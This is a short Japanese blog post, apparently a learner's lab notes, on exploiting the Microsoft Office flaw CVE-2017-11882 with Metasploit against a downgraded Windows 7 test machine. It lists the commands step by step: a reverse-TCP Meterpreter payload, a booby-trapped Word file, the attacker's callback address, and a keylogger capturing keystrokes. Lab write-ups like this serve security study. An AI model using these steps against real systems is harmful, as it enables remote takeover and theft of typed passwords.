サイバーセキュリティはじめました

ハニーポット(T-POT)の検証や攻撃の実験など、サイバーセキュリティに関して少しずつ勉強しています。

【攻撃の体験】 CVE2017-11882を使用してExploit

今回は、CVE2017-11882(Microsoft Office)の脆弱性を使用して、PCをExploitする実験を行ってみました。

Exploit後はいろいろなことができそうでしたが、今回はキー入力を抜き取ってみました。

 

 

環境は以下の通りとなります。

 

テスト環境

 攻撃を受けるPC:Windows7 Office2016(脆弱性修正前の状態にダウングレード)

 攻撃するPC   :Kali Linux

 

使用したコマンド

 msfconsole

  →metasploitの起動

 set payload windows/meterpreter/reverse_tcp

  →payloadの指定

 set filename ・・・

  →攻撃に使用するWORDファイルの作成場所とファイル名の指定

 set lhost ・・・

  →攻撃した相手の接続先(攻撃者のIPアドレス)の指定

 Exploit

  →Exploitの実行

 sessions

  →確立したセッションの確認

 sessions -i 1

  →確立したセッションへの接続

 sysinfo

  →システム情報の表示

 keyscan_start

  →キー入力の情報取得開始

 keyscan_dump

  →キー入力の情報表示

 

動画をご覧いただければ、想像以上に簡単にexploitできてしまうということが分かるかと思います。